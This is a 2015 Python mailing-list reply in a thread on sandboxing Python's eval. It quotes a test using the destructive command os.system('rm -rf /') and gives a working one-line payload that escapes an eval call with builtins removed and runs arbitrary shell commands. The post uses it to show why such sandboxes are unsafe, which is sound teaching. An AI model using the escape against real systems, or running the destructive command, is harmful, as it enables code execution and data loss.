Path: csiph.com!goblin2!goblin.stu.neva.ru!newsfeed.xs4all.nl!newsfeed7.news.xs4all.nl!nzpost1.xs4all.net!not-for-mail
Return-Path: <rosuav@gmail.com>
X-Original-To: python-list@python.org
Delivered-To: python-list@mail.python.org
X-Spam-Status: OK 0.003
X-Spam-Evidence: '*H*': 0.99; '*S*': 0.00; 'subject:Python': 0.05; 'properly.': 0.07; 'cc:addr:python-list': 0.09; '*is*': 0.09; '-rf': 0.09; 'builtins': 0.09; 'operator,': 0.09; 'typeerror:': 0.09; 'url:blog': 0.10; 'do,': 0.15; '"use': 0.16; '23,': 0.16; 'attributes.': 0.16; 'eval': 0.16; 'from:addr:rosuav': 0.16; 'from:name:chris angelico': 0.16; 'literal,': 0.16; 'stuff.': 0.16; 'wrote:': 0.16; 'of.': 0.18; 'skip:{ 20': 0.18; 'thanks.': 0.18; '>>>': 0.20; '2015': 0.20; 'cc:2**0': 0.20; 'cc:addr:python.org': 0.20; 'aug': 0.20; 'proposed': 0.20; '"",': 0.22; 'lawrence': 0.22; 'please?': 0.22; 'sorry,': 0.22; 'am,': 0.23; 'import': 0.24; '(most': 0.24; 'header:In-Reply-To:1': 0.24; 'module': 0.25; 'chris': 0.26; 'message-id:@mail.gmail.com': 0.27; 'skip:e 30': 0.27; 'end,': 0.29; "skip:' 70": 0.29; "i'm": 0.30; 'code': 0.30; "can't": 0.32; 'maybe': 0.33; 'traceback': 0.33; 'file': 0.34; 'received:google.com': 0.35; 'skip:( 30': 0.35; 'something': 0.35; 'but': 0.36; 'there': 0.36; 'subject:: ': 0.37; 'means': 0.39; 'mark': 0.40; 'still': 0.40; 'easy': 0.60; 'more': 0.63; 'safe': 0.63; 'believe': 0.66; 'here': 0.66; 'talking': 0.67; 'url:r': 0.67; 'subject': 0.70; 'led': 0.72; 'yourself': 0.73; 'chrisa': 0.84; 'to:none': 0.91; 'execution,': 0.91; 'tricks.': 0.91; 'safe.': 0.93; 'url:comments': 0.93
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:cc :content-type; bh=bhoK+sI/wbY3hChMQGEe6+OzMUXERjjfzydPE83ANYk=; b=HH6Zdw/vTf/l6yt0K2QgbAONkT6P0n1PT+NlUu60WmlOpgZeFaVZDWOWRtRKX/uH7f RCt2rvV+06yDHeQ20vSnxwyM41Lz4uZ0P6bQ4W5ebNsHKvERju4P8j6OoiZAh+nTxeTO 0lefiQc2iCxiqGkBq1lz/WG5q0dEImxW6OGrBw5bGY17HFFvQsCbxsHXySeVLacYLN7a eGIDQZC2I5IBSS6Cs4RtDNl9745YxzApf2IMakjImxwbrNTN1JsZYI8Tldm8+aBUbzvF hkOQG/PZZW7rdnGjV0vWfivhsMaiy/kd9U4zGRdxTFD6QYNTQ3cnkdpbIUoyjeH4G4pt qH5Q==
MIME-Version: 1.0
X-Received: by 10.107.32.4 with SMTP id g4mr12083203iog.31.1440288290158; Sat, 22 Aug 2015 17:04:50 -0700 (PDT)
In-Reply-To: <mrb20m$l4d$1@ger.gmane.org>
References: <mrb0eh$2md$1@ger.gmane.org> <CAPTjJmrD3oBaHW64BNV6g9RM8LP7khdYUaXDjMXLeSb7dDe7Dg@mail.gmail.com> <mrb20m$l4d$1@ger.gmane.org>
Date: Sun, 23 Aug 2015 10:04:50 +1000
Subject: Re: Sandboxing Python
From: Chris Angelico <rosuav@gmail.com>
Cc: "python-list@python.org" <python-list@python.org>
Content-Type: text/plain; charset=UTF-8
X-BeenThere: python-list@python.org
X-Mailman-Version: 2.1.20+
Precedence: list
List-Id: General discussion list for the Python programming language <python-list.python.org>
List-Unsubscribe: <https://mail.python.org/mailman/options/python-list>, <mailto:python-list-request@python.org?subject=unsubscribe>
List-Archive: <http://mail.python.org/pipermail/python-list/>
List-Post: <mailto:python-list@python.org>
List-Help: <mailto:python-list-request@python.org?subject=help>
List-Subscribe: <https://mail.python.org/mailman/listinfo/python-list>, <mailto:python-list-request@python.org?subject=subscribe>
Newsgroups: comp.lang.python
Message-ID: <mailman.22.1440288298.17298.python-list@python.org>
Lines: 65
NNTP-Posting-Host: 2001:888:2000:d::a6
X-Trace: 1440288298 news.xs4all.nl 23833 [2001:888:2000:d::a6]:41720
X-Complaints-To: abuse@xs4all.nl
Xref: csiph.com comp.lang.python:95572

On Sun, Aug 23, 2015 at 9:52 AM, Mark Lawrence <breamoreboy@yahoo.co.uk> wrote:
> On 23/08/2015 00:44, Chris Angelico wrote:
>>
>> On Sun, Aug 23, 2015 at 9:25 AM, Mark Lawrence <breamoreboy@yahoo.co.uk>
>> wrote:
>>>
>>> I was always led to believe that the subject was a difficult thing to do,
>>> but here
>>>
>>> https://www.reddit.com/r/learnpython/comments/3huz4x/how_to_do_math_inside_raw_input/
>>> is a safe solution in only 23 characters, or are there any discernable
>>> flaws
>>> in it?
>>
>>
>>
>> I'm sorry, I can't see which solution you're talking about there -
>> maybe I just don't know how to read reddit properly. Can you paste the
>> proposed code please?
>>
>> The best I can see there is "use eval but with no builtins". That's
>> fundamentally flawed because you don't need builtins to break stuff.
>> All you need is a literal, from which you can snag everything else via
>> its attributes.
>>
>> However, for this situation, I would be recommending ast.literal_eval,
>> which *is* safe. It's a lot more powerful than "split it into number,
>> operator, number" as mentioned at the end, but still can't majorly
>> break anything.
>>
>> ChrisA
>>
>
> <code>
>>>> import os
>>>> eval("os.system('rm -rf /')", {"__builtins__":None})
> Traceback (most recent call last):
>   File "<pyshell#8>", line 1, in <module>
>     eval("os.system('rm -rf /')", {"__builtins__":None})
>   File "<string>", line 1, in <module>
> TypeError: 'NoneType' object is not subscriptable
> </code>
>
> <comment>
> Surely I must I have missed your meaning because I needed just 23 characters
> and zero extra lines to create a safe sandbox for this, but you've said that
> the core developers have tried and failed to do this. It appears that I
> didn't just wipe out my entire filesystem and you've stated quite
> matter-of-factly that there is no safe solution... so what happened here?
> Why didn't my filesystem just get wiped out?
> </comment>

Got it, thanks. The answer is: It's easy to make something you can't
yourself break out of. It just means you don't know all the tricks.

http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html

>>> cmd="""[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings'][0]()._module.__builtins__["__import__"]("os").system("echo Hello")"""
>>> eval(cmd,{"__builtins__":None})
Hello
0

Et voila. Arbitrary module loading, arbitrary code execution, have fun.

ChrisA